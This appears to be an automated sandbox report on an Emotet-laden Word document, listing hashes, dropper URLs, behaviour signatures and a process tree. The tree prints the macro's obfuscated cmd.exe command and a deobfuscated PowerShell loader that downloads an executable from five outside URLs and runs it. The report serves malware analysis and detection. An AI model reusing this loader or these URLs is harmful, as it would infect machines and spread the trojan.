Analysis

  • max time kernel
    137s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    17-06-2024 20:33

General

  • Target

    b9ea54d7115c94d28eb87047cda990e1_JaffaCakes118.doc

  • Size

    147KB

  • MD5

    b9ea54d7115c94d28eb87047cda990e1

  • SHA1

    5bc51c3fd4ce45cf1e185c3fac0daffdbdf338c5

  • SHA256

    962ff19f56b94669106e2eb69ef717e0a590591608370c41b239a0649d19cfb2

  • SHA512

    aa6eaf72f92b00475c6dd6bc6a6f00ac6576b9258b69d32e013052f5f21157c698eeec1d8d7173d12cb9ab392b8ba545bebcae9d60df413edadef9334c913b2a

  • SSDEEP

    1536:F81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a9OUVk0mksZHT:F8GhDS0o9zTGOZD6EbzCda0mkmHT

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://alistairmccoy.co.uk/0R

exe.dropper

http://erinkveld.eu/tKlZyU

exe.dropper

http://dentaware.com/PbF

exe.dropper

http://havmore.in/UXxra

exe.dropper

http://aphn.org/zTADPIb

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies data under HKEY_USERS 18 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\b9ea54d7115c94d28eb87047cda990e1_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1928
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:3040
      • \??\c:\windows\SysWOW64\cmd.exe
        c:\bTorQSzoJk\vIzwwzd\TBWRXjkRVBf\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set LEA=uUTnlInWPSJGzFDwviio(Cxc)e8dp$mj0yVfOX;@Bb,+Eg:NHZhR}r{/\A3skL=.'ta- K&&for %W in (29;53;47;51;62;64;15;40;65;64;38;29;4;31;65;62;6;25;15;67;19;41;31;25;23;65;68;47;25;65;63;7;25;41;21;4;18;25;6;65;38;29;61;12;31;62;64;50;65;65;28;46;55;55;66;4;18;59;65;66;18;53;30;23;23;19;33;63;23;19;63;0;60;55;32;51;39;50;65;65;28;46;55;55;25;53;18;6;60;16;25;4;27;63;25;0;55;65;69;4;49;33;1;39;50;65;65;28;46;55;55;27;25;6;65;66;15;66;53;25;63;23;19;30;55;8;41;13;39;50;65;65;28;46;55;55;50;66;16;30;19;53;25;63;18;6;55;1;37;22;53;66;39;50;65;65;28;46;55;55;66;28;50;6;63;19;53;45;55;12;2;57;14;8;5;41;64;63;9;28;4;18;65;20;64;39;64;24;38;29;59;66;69;62;64;51;6;69;64;38;29;14;66;15;68;62;68;64;58;26;64;38;29;44;27;37;62;64;44;2;61;64;38;29;47;8;0;62;29;25;6;16;46;65;25;30;28;43;64;56;64;43;29;14;66;15;43;64;63;25;22;25;64;38;35;19;53;25;66;23;50;20;29;4;31;8;68;18;6;68;29;61;12;31;24;54;65;53;33;54;29;4;31;65;63;14;19;15;6;4;19;66;27;13;18;4;25;20;29;4;31;8;42;68;29;47;8;0;24;38;29;12;59;36;62;64;48;13;57;64;38;5;35;68;20;20;11;25;65;67;5;65;25;30;68;29;47;8;0;24;63;4;25;6;45;65;50;68;67;45;25;68;26;32;32;32;32;24;68;54;5;6;16;19;60;25;67;5;65;25;30;68;29;47;8;0;38;29;2;34;37;62;64;31;10;10;64;38;41;53;25;66;60;38;52;52;23;66;65;23;50;54;52;52;29;11;9;61;62;64;12;31;66;64;38;72)do set Zb9=!Zb9!!LEA:~%W,1!&&if %W geq 72 powershell.exe "!Zb9:*Zb9!=!""
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2548
        • C:\Windows\SysWOW64\cmd.exe
          CmD /V:O/C"set LEA=uUTnlInWPSJGzFDwviio(Cxc)e8dp$mj0yVfOX;@Bb,+Eg:NHZhR}r{/\A3skL=.'ta- K&&for %W in (29;53;47;51;62;64;15;40;65;64;38;29;4;31;65;62;6;25;15;67;19;41;31;25;23;65;68;47;25;65;63;7;25;41;21;4;18;25;6;65;38;29;61;12;31;62;64;50;65;65;28;46;55;55;66;4;18;59;65;66;18;53;30;23;23;19;33;63;23;19;63;0;60;55;32;51;39;50;65;65;28;46;55;55;25;53;18;6;60;16;25;4;27;63;25;0;55;65;69;4;49;33;1;39;50;65;65;28;46;55;55;27;25;6;65;66;15;66;53;25;63;23;19;30;55;8;41;13;39;50;65;65;28;46;55;55;50;66;16;30;19;53;25;63;18;6;55;1;37;22;53;66;39;50;65;65;28;46;55;55;66;28;50;6;63;19;53;45;55;12;2;57;14;8;5;41;64;63;9;28;4;18;65;20;64;39;64;24;38;29;59;66;69;62;64;51;6;69;64;38;29;14;66;15;68;62;68;64;58;26;64;38;29;44;27;37;62;64;44;2;61;64;38;29;47;8;0;62;29;25;6;16;46;65;25;30;28;43;64;56;64;43;29;14;66;15;43;64;63;25;22;25;64;38;35;19;53;25;66;23;50;20;29;4;31;8;68;18;6;68;29;61;12;31;24;54;65;53;33;54;29;4;31;65;63;14;19;15;6;4;19;66;27;13;18;4;25;20;29;4;31;8;42;68;29;47;8;0;24;38;29;12;59;36;62;64;48;13;57;64;38;5;35;68;20;20;11;25;65;67;5;65;25;30;68;29;47;8;0;24;63;4;25;6;45;65;50;68;67;45;25;68;26;32;32;32;32;24;68;54;5;6;16;19;60;25;67;5;65;25;30;68;29;47;8;0;38;29;2;34;37;62;64;31;10;10;64;38;41;53;25;66;60;38;52;52;23;66;65;23;50;54;52;52;29;11;9;61;62;64;12;31;66;64;38;72)do set Zb9=!Zb9!!LEA:~%W,1!&&if %W geq 72 powershell.exe "!Zb9:*Zb9!=!""
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2516
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe "$rNR='wBt';$ljt=new-object Net.WebClient;$Lzj='http://alistairmccoy.co.uk/0R@http://erinkveld.eu/tKlZyU@http://dentaware.com/PbF@http://havmore.in/UXxra@http://aphn.org/zTADPIb'.Split('@');$saK='RnK';$Daw = '38';$EdX='ETL';$NPu=$env:temp+'\'+$Daw+'.exe';foreach($ljP in $Lzj){try{$ljt.DownloadFile($ljP, $NPu);$zsO='HFA';If ((Get-Item $NPu).length -ge 80000) {Invoke-Item $NPu;$TVX='jJJ';break;}}catch{}}$GSL='zja';"
            4⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2704
            • C:\Users\Admin\AppData\Local\Temp\38.exe
              "C:\Users\Admin\AppData\Local\Temp\38.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:1720
              • C:\Users\Admin\AppData\Local\Temp\38.exe
                "C:\Users\Admin\AppData\Local\Temp\38.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                PID:2580
    • C:\Windows\SysWOW64\balloonclear.exe
      "C:\Windows\SysWOW64\balloonclear.exe"
      1⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2960
      • C:\Windows\SysWOW64\balloonclear.exe
        "C:\Windows\SysWOW64\balloonclear.exe"
        2⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        PID:2620

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      3bd9b9430dd7737caafe94e39dae56fb

      SHA1

      53de0fd722c99ad95a06c21cb66623797e91f161

      SHA256

      76aafdaafd9ef54624a6f8fc39f8f1d71af1461ad5cc992f608c18a0e7771cd6

      SHA512

      fef9eb0105441d87d738c0d09985b6f372f028fa56c8309de608366db26ee79f8ce006d589b91ca5ee0220e32789c51f6ff5c36b31eb63ba9bd0e7bd3c427497

    • \Users\Admin\AppData\Local\Temp\38.exe

      Filesize

      376KB

      MD5

      ac4ad219921aa13ac020f5dc460ad503

      SHA1

      df3cadeb2736d3df7a31c6c9d3dad122d9570e16

      SHA256

      4a417963968601bbe8f9311d779d1a022a380829bed4b7af4daf934eeba5c70f

      SHA512

      2df686213ea67e030440deb61fed6559f721b0b6bf973915c7509b1cc15896669ffab5061cfc1674d358c819e69756276a0e8180e65ee47855d4b5ab882676fb

    • memory/1720-26-0x0000000000330000-0x0000000000347000-memory.dmp

      Filesize

      92KB

    • memory/1720-22-0x0000000000330000-0x0000000000347000-memory.dmp

      Filesize

      92KB

    • memory/1928-6-0x0000000000750000-0x0000000000850000-memory.dmp

      Filesize

      1024KB

    • memory/1928-7-0x0000000000750000-0x0000000000850000-memory.dmp

      Filesize

      1024KB

    • memory/1928-8-0x0000000000750000-0x0000000000850000-memory.dmp

      Filesize

      1024KB

    • memory/1928-48-0x000000007141D000-0x0000000071428000-memory.dmp

      Filesize

      44KB

    • memory/1928-2-0x000000007141D000-0x0000000071428000-memory.dmp

      Filesize

      44KB

    • memory/1928-65-0x000000007141D000-0x0000000071428000-memory.dmp

      Filesize

      44KB

    • memory/1928-0-0x000000002FD01000-0x000000002FD02000-memory.dmp

      Filesize

      4KB

    • memory/1928-64-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1928-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1928-49-0x0000000000750000-0x0000000000850000-memory.dmp

      Filesize

      1024KB

    • memory/2580-30-0x0000000000350000-0x0000000000367000-memory.dmp

      Filesize

      92KB

    • memory/2580-47-0x00000000000C0000-0x0000000000124000-memory.dmp

      Filesize

      400KB

    • memory/2580-34-0x0000000000350000-0x0000000000367000-memory.dmp

      Filesize

      92KB

    • memory/2620-42-0x00000000001E0000-0x00000000001F7000-memory.dmp

      Filesize

      92KB

    • memory/2620-46-0x00000000001E0000-0x00000000001F7000-memory.dmp

      Filesize

      92KB

    • memory/2960-36-0x00000000002B0000-0x00000000002C7000-memory.dmp

      Filesize

      92KB

    • memory/2960-40-0x00000000002B0000-0x00000000002C7000-memory.dmp

      Filesize

      92KB